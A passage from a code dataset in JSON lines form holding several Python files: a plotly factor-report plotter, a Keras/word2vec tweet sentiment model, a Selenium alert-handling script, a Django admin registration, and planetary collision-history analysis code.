# else:\n ema_param.mul_(self.alpha)\n ema_param.add_(param * one_minus_alpha)\n\n\nif __name__ == \"__main__\":\n\n fmt = \"{time:YYYY-MM-DD HH:mm:ss.SSS} | [{extra[stage]}] | {level: <8} | {message}\"\n logger.remove()\n logger.add(sys.stderr, format=fmt)\n main()\n","repo_name":"FBLADL/NVUM","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":12223,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"48"} +{"seq_id":"5281275472","text":"import plotly.express as px \nfrom plotly.figure_factory import create_table\nimport plotly.graph_objects as go\nfrom plotly.subplots import make_subplots\nimport webbrowser\n\n\n\n\n\n\ndef summary_plot(report,excess=True,mode='notebook'):\n \"\"\"\n \"\"\"\n\n excess_str = 'excess' if excess else ''\n factor = report['factor']\n fig_list = []\n # ic_decay\n fig_ic_decay = px.bar(report['ic_decay'].mean(),title=f\"{factor} ic decay
    universe:{report['universe']}\")\n ic_decay_min = report['ic_decay'].mean().min()\n ic_decay_max = report['ic_decay'].mean().max()\n fig_ic_decay.update_layout(yaxis_range=[max(-0.2,ic_decay_min),min(0.2,ic_decay_max)])\n fig_list.append(fig_ic_decay)\n\n\n # ic-series\n ic_series = report['ic_series']\n ic_series_ma = ic_series.rolling(12).mean()\n fig_ic_series = make_subplots()\n index = ic_series_ma.index\n fig_ic_series.add_trace(\n go.Scatter(x=index ,y=ic_series_ma.values.tolist(),name='ic_ma12')\n )\n fig_ic_series.add_trace(\n go.Bar(x=index, y=ic_series.values.tolist(), name=\"ic\")\n )\n fig_ic_series.update_layout(title=f\"{factor} ic series
    universe:{report['universe']}\")\n fig_list.append(fig_ic_series)\n\n\n # 分组净值\n for _group in report['groups'].keys():\n sub_report = report['groups'][_group]\n group_nvs = sub_report['group_nvs']\n fig_group_nvs = px.line(group_nvs-1)\n fig_group_nvs.update_layout(title=f\"{factor} cumulative {excess_str} return(compound) of different groups
    groups:{_group} | universe:{report['universe']}\")\n # fig_group_nvs.show()\n fig_list.append(fig_group_nvs)\n\n \n for _group in report['groups'].keys():\n # 多头收益\n sub_report = report['groups'][_group]\n group_return_long = sub_report['group_return_long']\n group_return_long_ma = group_return_long.rolling(12).mean()\n fig_group_return_long = make_subplots()\n index = group_return_long_ma.index\n fig_group_return_long.add_trace(\n go.Scatter(x=index ,y=group_return_long_ma.values.tolist(),name='return_ma12')\n )\n fig_group_return_long.add_trace(\n go.Bar(x=index, y=group_return_long.values.tolist(), name=\"return\")\n )\n fig_group_return_long.update_layout(title=f\"{factor} long side {excess_str} return
    groups:{_group} | universe:{report['universe']}\")\n # fig_group_return_long.show()\n fig_list.append(fig_group_return_long)\n\n # for _group in report['groups'].keys():\n # 空头收益\n sub_report = report['groups'][_group]\n group_return_short = sub_report['group_return_short']\n group_return_short_ma = group_return_short.rolling(12).mean()\n fig_group_return_short = make_subplots()\n index = group_return_short_ma.index\n fig_group_return_short.add_trace(\n go.Scatter(x=index ,y=group_return_short_ma.values.tolist(),name='return_ma12')\n )\n fig_group_return_short.add_trace(\n go.Bar(x=index, y=group_return_short.values.tolist(), name=\"return\")\n )\n fig_group_return_short.update_layout(title=f\"{factor} short side {excess_str} return
    groups:{_group} | universe:{report['universe']}\")\n # fig_group_return_short.show()\n fig_list.append(fig_group_return_short)\n\n for _group in report['groups'].keys():\n sub_report = report['groups'][_group] \n fig_ret_SR_TO = make_subplots(rows=1,cols=3)\n # 分组年化收益\n ann_ret = sub_report['ann_ret']\n index = ann_ret.index\n fig_ret_SR_TO.add_trace(\n go.Bar(x=index,y=ann_ret.values,name=f'annual {excess_str} return'),row=1,col=1\n )\n # fig_ann_ret.show()\n\n # 分组夏普\n SR = sub_report['SR']\n index = SR.index\n fig_ret_SR_TO.add_trace(\n go.Bar(x=index,y=SR.values,name=f'SR'),row=1,col=2\n )\n\n # 分组换手\n TO = sub_report['TO']\n index = TO.index\n fig_ret_SR_TO.add_trace(\n go.Bar(x=index,y=TO.values,name='TO'),row=1,col=3\n )\n fig_ret_SR_TO.update_layout(title=f\"{factor} annual {excess_str} return, SR and TO
    groups:{_group} | universe:{report['universe']}\")\n fig_list.append(fig_ret_SR_TO)\n\n for _group in report['groups'].keys():\n # 分组评估指标\n sub_report = report['groups'][_group]\n perfs = sub_report['excess_performance']\n perfs = perfs.rename(index={'turnover_ratio':'TO'})\n table_perfs = create_table(perfs.reset_index())\n table_perfs.update_layout(title=f\"{excess_str} performance indicator
    groups:{_group} | universe:{report['universe']}\")\n fig_list.append(table_perfs)\n # for _fig in fig_list:\n\n\n # bar_factor_ana = px.bar(report['factor_ana'],x='set',y='ic.mean',color='group',barmode='group',title='ic of different ep & liquidity')\n # bar_factor_ana.update_layout(title=f\"{factor} ic of different sort
    universe:{report['universe']}\")\n # fig_list.append(bar_factor_ana)\n\n for _i in range(len(fig_list)):\n _fig = fig_list[_i]\n if mode !='notebook':\n mode = 'a' if _i > 0 else 'w'\n file = factor.replace(' ',\"_\")+'.html'\n with open(file, mode) as f: \n f.write(_fig.to_html(full_html=False, include_plotlyjs='cdn'))\n else:\n _fig.show()\n if mode !='notebook':\n webbrowser.open( file,new=2)\n\n\n\n","repo_name":"robortcher/easyquant","sub_path":"easyquant/easyalpha/plotting.py","file_name":"plotting.py","file_ext":"py","file_size_in_byte":5513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"69851427985","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nplt.style.use('fivethirtyeight')\n\n'''\nBy padding the inputs, we decide the maximum length of words in a sentence, then zero pads the rest, if the input length\nis sharter than the designated length. \n'''\ncsv = 'data/clean_tweet.csv'\nmy_df = pd.read_csv(csv, index_col=0)\nmy_df.dropna(inplace=True)\nmy_df.reset_index(drop=True,inplace=True)\nmy_df = pd.concat([my_df[my_df.target == 0][:int(len(my_df)*0.05)],my_df[my_df.target == 4][:int(len(my_df)*0.05)]])\nmy_df.info()\n\nx = my_df.text\ny = my_df.target\n\nfrom sklearn.cross_validation import train_test_split\nSEED = 2000\nx_train, x_validation_and_test, y_train, y_validation_and_test = train_test_split(x, y, test_size=.02, random_state=SEED)\nx_validation, x_test, y_validation, y_test = train_test_split(x_validation_and_test, y_validation_and_test, test_size=.5, random_state=SEED)\n\nprint(\"Train set has total {0} entries with {1:.2f}% negative, {2:.2f}% positive\".format(len(x_train),\n (len(x_train[y_train == 0]) / (len(x_train)*1.))*100,\n (len(x_train[y_train == 1]) / (len(x_train)*1.))*100))\nprint(\"Validation set has total {0} entries with {1:.2f}% negative, {2:.2f}% positive\".format(len(x_validation),\n (len(x_validation[y_validation == 0]) / (len(x_validation)*1.))*100,\n (len(x_validation[y_validation == 1]) / (len(x_validation)*1.))*100))\nprint(\"Test set has total {0} entries with {1:.2f}% negative, {2:.2f}% positive\".format(len(x_test),\n (len(x_test[y_test == 0]) / (len(x_test)*1.))*100,\n (len(x_test[y_test == 1]) / (len(x_test)*1.))*100))\n\nfrom tqdm import tqdm\ntqdm.pandas(desc = 'progress-bar')\nimport gensim\nfrom gensim.models.word2vec import Word2Vec\nfrom gensim.models.doc2vec import TaggedDocument\nimport multiprocessing\nfrom sklearn import utils\n\ndef labelize_tweets_ug(tweets, label):\n result = []\n prefix = label\n for i,t in zip(tweets.index, tweets):\n result.append(TaggedDocument(t.split(),[prefix + '_%s' % i]))\n return result\n\nall_x = pd.concat([x_train, x_validation,x_test])\nall_x_w2v = labelize_tweets_ug(all_x,'all')\n\ncores = multiprocessing.cpu_count()\nmodel_ug_cbow = Word2Vec(sg = 0,size=100,negative=5,window=2,min_count=2,workers=cores, alpha=0.065,min_alpha=0.065)\nmodel_ug_cbow.build_vocab([x.words for x in tqdm(all_x_w2v)])\nfor epoch in range(30):\n model_ug_cbow.train(utils.shuffle([x.words for x in tqdm(all_x_w2v)]),total_examples=len(all_x_w2v),epochs=1)\n model_ug_cbow.alpha -= 0.002\n model_ug_cbow.min_alpha = model_ug_cbow.alpha\n\nmodel_ug_sg = Word2Vec(sg =1, size =100, negative=5,min_count=2,window=2,workers=cores,alpha=0.065,min_alpha=0.065)\nmodel_ug_sg.build_vocab([x.words for x in tqdm(all_x_w2v)])\nfor epoch in range(30):\n model_ug_sg.train(utils.shuffle([x.words for x in tqdm(all_x_w2v)]),total_examples=len(all_x_w2v),epochs=1)\n model_ug_sg.alpha -= 0.002\n model_ug_sg.min_alpha = model_ug_sg.alpha\n\nmodel_ug_cbow.save('word2vec_model/model_ug_cbow.word2vec')\nmodel_ug_sg.save('word2vec_model/model_ug_sg.word2vec')\n\n\n''' Preparation for CNN '''\n\nfrom gensim.models import KeyedVectors\nmodel_ug_cbow = KeyedVectors.load('word2vec_model/model_ug_cbow.word2vec')\nmodel_ug_sg = KeyedVectors.load('word2vec_model/model_ug_sg.word2vec')\n\nlen(model_ug_cbow.wv.vocab.keys())\n\n'''\nBy running below code block, I am constructing a sort of dictionary I can extract the word vectors from. \nSince I have two different Word2Vec models, below \"embedding_index\" will have concatenated vectors of the \ntwo models. For each model, I have 100 dimension vector representation of the words, and by concatenating \neach word will have 200 dimension vector representation.\n'''\nembeddings_index = {}\nfor w in model_ug_cbow.wv.vocab.keys():\n embeddings_index[w] = np.append(model_ug_cbow.wv[w],model_ug_sg.wv[w])\nprint('Found %s word vectors.' % len(embeddings_index))\n\nfrom keras.preprocessing.text import Tokenizer\nfrom keras.preprocessing.sequence import pad_sequences\n\ntokenizer = Tokenizer(num_words=100000)\ntokenizer.fit_on_texts(x_train)\nsequences = tokenizer.texts_to_sequences(x_train)\n\nlen(tokenizer.word_index)\n\n## below are the first five entries of the original train data\nfor x in x_train[:5]:\n print(x)\nsequences[:5]\n\n## figure the max sequence length\nlength = []\nfor x in x_train:\n length.append(len(x.split()))\n\nmax(length) ## max length of sequence is 34, let's make the seq length is little longer 45\nx_train_seq = pad_sequences(sequences,maxlen=45)\nprint('Shape of data tensor:', x_train_seq.shape)\nx_train_seq[:5]\n\nsequences_val = tokenizer.texts_to_sequences(x_validation)\nx_val_seq = pad_sequences(sequences_val, maxlen=45)\n\nnum_words = 100000\nembedding_matrix = np.zeros((num_words,200))\nfor word, i in tokenizer.word_index.items():\n if i >= num_words:\n continue\n embeddings_vector = embeddings_index.get(word)\n if embeddings_vector is not None:\n embedding_matrix[i] = embeddings_vector\n\n\n''' Build Normal ANN Model '''\nseed = 7\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout,Flatten\nfrom keras.layers.embeddings import Embedding\n\nmodel_ptw2v = Sequential()\ne = Embedding(100000,200,weights=[embedding_matrix],input_length=45,trainable=True)\nmodel_ptw2v.add(e)\nmodel_ptw2v.add(Flatten())\nmodel_ptw2v.add(Dense(256,activation='relu'))\nmodel_ptw2v.add(Dense(1,activation='sigmoid'))\nmodel_ptw2v.compile(loss='binary_crossentropy',\n optimizer='adam',\n metrics=['accuracy'])\nmodel_ptw2v.fit(x_train_seq,y_train,validation_data=(x_val_seq,y_validation),epochs=5,batch_size=32,verbose=2)\n\n\n''' CNN '''\nfrom keras.layers import Conv1D,GlobalMaxPool1D\nstructure_test = Sequential()\ne = Embedding(100000,200,input_length=45)\nstructure_test.add(e)\nstructure_test.add(Conv1D(filters=100,kernel_size=2,padding='valid',activation='relu',strides=1))\nstructure_test.summary()\n\nmodel_cnn_01 = Sequential()\ne = Embedding(100000, 200, weights=[embedding_matrix], input_length=45, trainable=True)\nmodel_cnn_01.add(e)\nmodel_cnn_01.add(Conv1D(filters=100, kernel_size=2, padding='valid', activation='relu', strides=1))\nmodel_cnn_01.add(GlobalMaxPool1D())\nmodel_cnn_01.add(Dense(256, activation='relu'))\nmodel_cnn_01.add(Dense(1, activation='sigmoid'))\nmodel_cnn_01.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])\nmodel_cnn_01.fit(x_train_seq, y_train, validation_data=(x_val_seq, y_validation), epochs=5, batch_size=32, verbose=2)\n\n## combined bigram, trigram, fourgram\nfrom keras.layers import Input,Dense, concatenate,Activation\nfrom keras.models import Model\n\ntweet_input = Input(shape=(45,),dtype='int32')\n\ntweet_encoder = Embedding(100000,200,weights=[embedding_matrix],input_length=45,trainable=True)(tweet_input)\nbigram_branch = Conv1D(filters=100,kernel_size=2,padding='valid',activation='relu',strides=1)(tweet_encoder)\nbigram_branch = GlobalMaxPool1D()(bigram_branch)\n\ntrigram_branch = Conv1D(filters=100,kernel_size=3,padding='valid',activation='relu',strides=1)(tweet_encoder)\ntrigram_branch = GlobalMaxPool1D()(trigram_branch)\n\nfourgram_branch = Conv1D(filters=100,kernel_size=4,padding='valid',activation='relu',strides=1)(tweet_encoder)\nfourgram_branch = GlobalMaxPool1D()(fourgram_branch)\n\nmerged = concatenate([bigram_branch,trigram_branch,fourgram_branch],axis = 1)\n\nmerged = Dense(256,activation='relu')(merged)\nmerged = Dropout(0.2)(merged)\nmerged = Dense(1)(merged)\noutput = Activation('sigmoid')(merged)\nmodel = Model(inputs=[tweet_input],outputs=[output])\nmodel.compile(loss='binary_crossentropy',\n optimizer='adam',\n metrics=['accuracy'])\nmodel.summary()\n\nfrom keras.callbacks import ModelCheckpoint\nfilepath = 'cnn_model/CNN_best_weights.{epoch:02d}-{val_acc:.4f}.hdf5'\ncheckpoint = ModelCheckpoint(filepath,monitor='val_acc',verbose=1,save_best_only=True, mode='max')\nmodel.fit(x_train_seq,y_train, batch_size=32,epochs=5,validation_data=(x_val_seq,y_validation),callbacks=[checkpoint])\n\n\n## load model\nfrom keras.models import load_model\nloaded_CNN_model = load_model('cnn_model/CNN_best_weights.{epoch:02d}-{val_acc:.4f}.hdf5')\nloaded_CNN_model.evaluate(x=x_val_seq,y=y_validation)\n\n## finally, model evluation with test set\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.linear_model import LogisticRegression\ntvec = TfidfVectorizer(max_features=100000,ngram_range=(1,3))\ntvec.fit(x_train)\n\nx_train_tfidf = tvec.transform(x_train)\nx_test_tfidf = tvec.transform(x_test)\n\nlr_with_tfidf = LogisticRegression()\nlr_with_tfidf.fit(x_train_tfidf,y_train)\n\nlr_with_tfidf.score(x_test_tfidf,y_test)\nyhat_lr = lr_with_tfidf.predict_proba(x_test_tfidf)\n\n\n\nsequences_test = tokenizer.texts_to_sequences(x_test)\nx_test_seq = pad_sequences(sequences_test,maxlen=45)\nloaded_CNN_model.evaluate(x=x_test_seq, y=y_test)\nyhat_cnn = loaded_CNN_model.predict(x_test_seq)\n\n\n## plot the graph\nfrom sklearn.metrics import roc_curve, auc\nfpr, tpr, threshold = roc_curve(y_test, yhat_lr[:,1])\nroc_auc = auc(fpr, tpr)\nfpr_cnn, tpr_cnn, threshold = roc_curve(y_test, yhat_cnn)\nroc_auc_nn = auc(fpr_cnn, tpr_cnn)\nplt.figure(figsize=(8,7))\nplt.plot(fpr, tpr, label='tfidf-logit (area = %0.3f)' % roc_auc, linewidth=2)\nplt.plot(fpr_cnn, tpr_cnn, label='w2v-CNN (area = %0.3f)' % roc_auc_nn, linewidth=2)\n\nplt.plot([0, 1], [0, 1], 'k--', linewidth=2)\nplt.xlim([-0.05, 1.0])\nplt.ylim([-0.05, 1.05])\nplt.xlabel('False Positive Rate', fontsize=18)\nplt.ylabel('True Positive Rate', fontsize=18)\nplt.title('Receiver operating characteristic: is positive', fontsize=18)\nplt.legend(loc=\"lower right\")\nplt.show()\n\n\n\n","repo_name":"Elvirasun28/sentiment_analysis_twitter","sub_path":"sentiment11.py","file_name":"sentiment11.py","file_ext":"py","file_size_in_byte":10035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28377292751","text":"import time\n\nfrom seleniumBasics.browser_invoking import invoke_browser\n\nurl = \"https://mail.rediff.com/cgi-bin/login.cgi\"\ndriver = invoke_browser()\ndriver.get(url)\ndriver.maximize_window()\ndriver.find_element_by_name(\"proceed\").click()\ntime.sleep(1)\nalert = driver.switch_to.alert\n\nprint(alert.text)\nalert.accept()\ntime.sleep(1)\ndriver.close()\n\n\n\n","repo_name":"mksingh8/seleniumSession2021","sub_path":"seleniumBasics/alert_handle_alert.py","file_name":"alert_handle_alert.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26614107962","text":"from django.contrib import admin\nfrom .models import Product, ProductImages\n\nclass ProductAdmin(admin.ModelAdmin):\n list_display = ('id', 'title', 'address','price', 'is_published', 'price', 'list_date','vendor')\n list_display_links = ('id', 'title')\n list_filter = ('vendor',)\n list_editable = ('is_published',)\n search_fields = ('title', 'address', 'city', 'price')\n list_per_page = 25\n# Register your models here.\n\nadmin.site.register(Product, ProductAdmin)\nadmin.site.register(ProductImages)\n","repo_name":"abubakar998/technical_test","sub_path":"backend/products/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26727082581","text":"import numpy as np\nfrom astropy.table import vstack,Table,Column,setdiff,join\nfrom tqdm import tqdm\nfrom tqdm import tqdm_notebook as tqdm\nimport astropy.units as u\nimport astropy.constants as c\nimport astropy.io \nimport sys\nimport colltree.util as util\n\n#set constants\nau = 1.495978707e8 #in km\nmunit = 5.0428958e31 #in grams\nmearth = 5.972e24*1e3 #in g\nmsol = 1.989e30*1e3 #in g\n\ndef get_vel(base_dir,fdir,folname_min,folname_max):\n '''Get a table of giant collisions that combines info from follow.maxcorecollisions and important_velcoities.out\n \n Input:\n base_dir = directory where runs are\n fdir = run directory\n folname_min = follow. file name\n folname_max = follow. file name\n \n Output:\n colls'''\n\n #read in data\n coll = util.read_follow(base_dir,fdir,folname_min,folname_max)\n \n #read in velocity data\n vel = Table.read(base_dir+fdir+'/important_velocities.out',format='ascii.no_header',\n names=('id1','id2','ctype','gamma','b','bcrit','time','vesc','vimp','vescalpha','veros',\n 'vcat','vsup','vhr','reveros','revsup'))\n\n #match up velocity info with collision info\n vround = np.vectorize(util.fround)\n vel['time'] = vround(vel['time'])\n tab = join(coll,vel,keys=['time'],join_type='left')\n\n #read in mass to get giant collisions from\n mtiny = np.genfromtxt(base_dir+fdir+'/continue.in')\n mask8 = tab['pmass'] >= mtiny[2]\n\n colls = tab[mask8]\n\n return(colls)\n\n\ndef get_allvel(base_dir,dir_tab,fname,ovw,folname_min,folname_max):\n '''Get a table of giant collision info, including impact parameters, for a list of directories\n \n Input:\n base_dir = directory where runs are\n dir_tab = table with runs to use\n fname = name of output file of giant collision info\n ovw = True if you want to overwrite any pre-existing files with that name\n folname_min = name of follow. file\n folname_max = name of follow. file\n \n Output:\n tot_colls = table with all collision data'''\n\n #define table\n tot_colls = Table(names=('dir','dloss','ecc','inc','slope','time','a','iac','iap','tmass','CMFt','CMFt_min','il','ilp','pmass','CMFp','CMFp_min','itype','iLR','LRMass','CMFLR','CMFLR_min','iSLR','SLRMass','CMFSLR','CMFSLR_min','inew','ideb','mdeb','id1','id2','ctype','gamma','b','bcrit','vesc','vimp','vescalpha','veros','vcat','vsup','vhr','reveros','revsup'),\n dtype=('U100','U12','float64','float64','U12','float64','float64','int32','int32','float64','float64','float64','int32','int32','float64','float64','float64','int32','int32','float64','float64','float64','int32','float64','float64','float64',\n 'int32','int32','float64','int32','int32','int32','float64','float64','float64','float64','float64','float64','float64','float64','float64','float64','float64','float64'))\n\n for i in range (0,len(dir_tab['dir'])):\n colls = get_vel(base_dir,dir_tab['dir'][i],folname_min,folname_max)\n\n #add columns with init params\n dir_c = Column([dir_tab['dir'][i]]*len(colls))\n dloss = Column([dir_tab['dloss'][i]]*len(colls))\n ecc = Column([dir_tab['av_ecc'][i]]*len(colls))\n inc = Column([dir_tab['av_inc'][i]]*len(colls))\n slope =Column([dir_tab['slope'][i]]*len(colls))\n colls.add_column(dir_c,name='dir',index=0)\n colls.add_column(dloss,name='dloss',index=1)\n colls.add_column(ecc,name='ecc',index=2)\n colls.add_column(inc,name='inc',index=3)\n colls.add_column(slope,name='slope',index=4)\n\n tot_colls = vstack([tot_colls,colls])\n\n #write table to a csv file in base_dir\n if ovw:\n tot_colls.write(base_dir+fname,format='ascii.csv',overwrite=True)\n\n return(tot_colls)\n\n\ndef iterate_clist(pcoll,clist,master_ids,new_ids,iname,p):\n \"\"\"Iterate through collisions list and add to collision history if not duplicate\n Input:\n pcoll = collision history table for this planet\n clist = list of collisions to search through\n master_ids = embryos that make up this planet\n new_ids = new planet ids in this list \n iname = name of ids to add to new_ids\n p = planet id\n\n Output:\n pcoll = updated version\n new_ids = updated version\"\"\"\n\n #add in all collisions that are not already in the collision table\n #add pid column\n pid_col = Column(p*np.ones(len(clist)))\n clist.add_column(pid_col, name='pid',index=0)\n\n #iterate through collision list\n for j in range(0,len(clist)):\n #search through only collisions for this planet\n maskp = pcoll['pid'] == p\n mask_collpid = []\n for r in pcoll[maskp]:\n mask_row = []\n for keys in pcoll.keys():\n mask_row += [r[keys] == clist[keys][j]]\n mask_collpid += [np.prod(mask_row)]\n duplicate = np.sum(mask_collpid)\n\n if not duplicate: #if the collision is not already in the history\n maskt = pcoll['time'] == clist[j]['time']\n pcoll.add_row(clist[j]) #add to pcoll\n\n if clist['itype'][j] == 4 or clist['itype'][j] >= 8:\n #add in new ids, otherwise don't care about other id coll history\n #if the secondary id is new, add to list\n if clist[iname][j] not in master_ids['id']:\n new_ids.add_row([clist[iname][j],clist['time'][j]])\n #if secondary id has later time, add to list\n else:\n mask_master = master_ids['id'] == clist[iname][j]\n if master_ids[mask_master]['time'] < clist['time'][j]:\n new_ids.add_row([clist[iname][j],clist['time'][j]])\n return(pcoll,new_ids)\n\n\n\ndef find_prev_coll(pcoll,ids,master_ids,collnew,p):\n \"\"\"Function that finds previous collisions for a given list of planet ids.\n Inputs:\n pcoll = the table of collisions that are already in the collision history table\n ids = table of ids and their collision times to find previous collisions for\n master_ids = table of ids that already have previous collisions found\n collnew = list of collisions for the whole run\n p = the final planet id\n\n Output:\n pcoll = updated version of the pcoll table\"\"\"\n\n\n #table to put in ids that need to find previous collisions for\n ids_to_find = Table(names=('id','time'))\n #table of ids that are new in this iteration, used to make ids_to_find\n new_ids = Table(names=('id','time'))\n\n #iterate through ids\n for i in range(0,len(ids)):\n\n mask1 = collnew['iap'] == ids['id'][i] #check if they are targets\n mask2 = collnew['ilp'] == ids['id'][i] #check if they are projectiles\n maskt = collnew['time'] < ids['time'][i] #make sure it happens before the child collision\n\n #get list of new collisions to consider\n clist1 = collnew[mask1&maskt]\n clist2 = collnew[mask2&maskt]\n\n if len(clist1) > 0:\n\n pcoll, new_ids = iterate_clist(pcoll,clist1,master_ids,new_ids,'ilp',p)\n\n if len(clist2) > 0:\n\n pcoll, new_ids = iterate_clist(pcoll,clist2,master_ids,new_ids,'iap',p)\n\n #cut this down to unique values and earliest time\n if len(new_ids) > 1:\n\n ids_group = new_ids.group_by('id')\n #pick time that is largest for each group\n for key, group in zip(ids_group.groups.keys,ids_group.groups):\n new_time = np.max(group['time'])\n\n #if it's not already there, add to master list\n if key['id'] not in master_ids['id']:\n master_ids.add_row([key['id'],new_time])\n\n #if it's not already there, need to look for new collisions\n ids_to_find.add_row([key['id'],new_time])\n elif key['id'] in master_ids['id']:\n mask_master = master_ids['id'] == key['id']\n #if this collisions is at an earlier time than the one you have, update time\n if master_ids[mask_master]['time'] < new_time:\n master_ids['time'][np.where(master_ids['id'] == key['id'])] = new_time\n\n #add to collisions to look for later collisions\n ids_to_find.add_row([key['id'],new_time])\n\n\n\n #if there's only one new id, just check it against master list\n elif len(new_ids) == 1:\n if new_ids['id'][0] not in master_ids['id']:\n master_ids.add_row([new_ids['id'][0],new_ids['time'][0]])\n\n #need to find new collisions for this id\n ids_to_find.add_row([new_ids['id'][0],new_ids['time'][0]])\n elif new_ids['id'][0] in master_ids['id']:\n mask_master = master_ids['id'] == new_ids['id'][0]\n if master_ids[mask_master]['time'] < new_ids['time'][0]:\n master_ids['time'][np.where(master_ids['id'] == new_ids['id'][0])] = new_ids['time'][0]\n\n #add to collisions to look for later collisions\n ids_to_find.add_row([new_ids['id'][0],new_ids['time'][0]])\n\n #find new collisions if there are any new ids\n if len(ids_to_find) == 0:\n return(pcoll,master_ids)\n elif len(ids_to_find) > 0:\n return(find_prev_coll(pcoll,ids_to_find,master_ids,collnew,p))\n\n\ndef get_small_coll(base_dir,dirn,scoll,emb_list,mtiny,p):\n \"\"\"Get the number of small collisions that occur over a planet's formation\n\n Input:\n base_dir = directory that folders are in\n dirn = folder name for this run\n scoll = table of the small collisions that happen to the planet\n emb_list = a table of the embryo ids that make up a planet's history, and time they entered that history\n mtiny = minimum embryo mass\n p = planet id\n\n Output:\n scoll = table of collision data \"\"\"\n \n #read in collision info\n colls = util.read_follow(base_dir,dirn)\n\n#get table with only small collisions\n maskm = colls['pmass'] < mtiny\n colls_small = colls[maskm]\n \n #get debris origin here\n debris = Table.read(base_dir+dirn+'/debris.origin',format='ascii.no_header',\n names=('time','d_iinit','origin'))\n \n \n for m in emb_list['id']:\n #only need ones where target is the same, we're looking at debris projectiles\n tmask = colls_small['iap'] == m\n slist = colls_small[tmask]\n \n if len(slist)>0:\n \n origin_time = [] ; origin_id = []\n #add debris origin and time\n for i in range(0,len(slist)):\n maskdi = debris['d_iinit'] == slist['ilp'][i]\n \n if len(debris[maskdi]) <= 0:\n origin_time.append(0)\n origin_id.append(0)\n else:\n origin_time.append(debris[maskdi]['time'][0])\n origin_id.append(debris[maskdi]['origin'][0])\n \n\n #add debris origin info\n slist.add_column(origin_time,name='origin_time')\n slist.add_column(origin_id,name='origin_id')\n \n \n #add pid\n slist.add_column([p]*len(slist),name='pid',index=0)\n slist.add_column(['other']*len(slist),name='origin_type')\n scoll = vstack([scoll,slist]) \n \n #origin type\n #sort into three groups: re-accretion, accretion from other bodies, \n #or specifically accretion from planets destroyed by supercatastrophic disruption\n mask = np.isin(scoll['origin_id'],emb_list['id'])\n scoll['origin_type'][mask] = 'reacc'\n \n mask1 = colls['itype'] == 1\n ids1 = np.concatenate((np.array(colls[mask1]['iap']),np.array(colls[mask1]['ilp'])),axis=0)\n maskin1 = np.isin(scoll['origin_id'],ids1)\n scoll['origin_type'][maskin1] = 'supercat'\n \n \n return(scoll)\n\ndef calc_coll_all(base_dir,fdir,coll,cparam,minemb,nparam,cname_min,cname_max,pl_ids=None):\n \"\"\"Calculating collisional history for planets. Calls find_prev_coll\n Inputs:\n base_dir = directory where runs are\n fdir = directory of simulation\n cparam = collision size to do collhist for. Options are: 'giant','small', or 'all'.\n coll = table of all giant collisions \n minemb = minimum embryo mass\n nparam = possible values are 'all' or 'some'. If all, computes collision history for all final planets. If 'some', computes collision history for planets listed in pl_ids. \n pl_ids = ids of planets to find collision histories for. Default value is None\n cname_min = name of comp file\n cname_max = name of comp file\n \n Outputs:\n pcoll = table of all giant collision histories\n scoll = table of all small collision histories\"\"\"\n \n print(fdir)\n\n dtsyn = Table(names=('dt','tloss1','tloss2'))\n DT = []\n pcoll = Table(names=('pid','dir','dloss','ecc','inc','slope','time','a','iac','iap','tmass',\n 'CMFt','CMFt_min','il','ilp','pmass','CMFp','CMFp_min','itype','iLR','LRMass',\n 'CMFLR','CMFLR_min','iSLR','SLRMass','CMFSLR','CMFSLR_min','inew','ideb','mdeb',\n 'id1','id2','ctype','gamma','b','bcrit','vesc','vimp','vescalpha','veros','vcat',\n 'vsup','vhr','reveros','revsup'),\n dtype=('int64','U100','U12','float64','float64','U12','float64','float64','int64','int64',\n 'float64','float64','float64','int64','int64','float64','float64','float64','int64',\n 'int64','float64','float64','float64','int64','float64','float64','float64','int64',\n 'int64','float64','int64','int64','int64','float64','float64','float64','float64',\n 'float64','float64','float64','float64','float64','float64','float64','float64'))\n\n scoll = Table(names=('pid','time','a','iac','iap','tmass',\n 'CMFt','CMFt_min','il','ilp','pmass','CMFp','CMFp_min','itype','iLR','LRMass',\n 'CMFLR','CMFLR_min','iSLR','SLRMass','CMFSLR','inew','ideb','mdeb',\n 'origin_time','origin_id','origin_type'),\n dtype=('int64','float64','float64','int64','int64','float64','float64',\n 'float64','int64','int64','float64','float64','float64','int64',\n 'int64','float64','float64','float64','int64','float64',\n 'float64','int64','int64','float64','float64','int64','U24'))\n \n #read in comp file to get final planets\n comp = util.read_comp(base_dir,fdir,'astropy',cname_min,cname_max)\n \n print(len(coll))\n\n mtiny = np.genfromtxt(base_dir+fdir+'/continue.in')\n \n if nparam == 'all':\n #make list of final planets\n plnts = comp.group_by('time')\n l = len(plnts.groups)\n\n #planets here are all embryos above some min embryos mass\n allplanets = plnts.groups[l-1]\n if minemb == 'embryo':\n maskmp = allplanets['mass'] > mtiny[2]*munit/mearth\n else:\n maskmp = allplanets['mass'] >= minemb\n planets = allplanets[maskmp]\n pl_ids = planets['iinit']\n\n elif nparam == 'some':\n if len(pl_ids) < 0:\n #if pl_ids == None:\n raise Exception('Error: for plparam == some, you must have a planet id column in dirtable')\n sys.exit(1)\n #planets['iinit'] = pl_ids #should this also have a time component? \n\n for p in pl_ids:\n\n #make table for the ids you're searching for\n ids = Table(names=('id','time'))\n ids.add_row([p,1e8])\n #make table for the master list of ids and add planet id\n master_ids = Table(names=('id','time'))\n master_ids.add_row([p,1e8])\n\n lp = len(pcoll)\n lm = len(master_ids)\n ls = len(scoll)\n\n if cparam == 'all' or cparam == 'giant':\n #find all collisions\n maskm = coll['tmass'] >= mtiny[2]\n maskm2 = coll['pmass'] >= mtiny[2]\n collnew = coll[maskm&maskm2]\n pcoll,master_ids = find_prev_coll(pcoll,ids,master_ids,collnew,p)\n\n 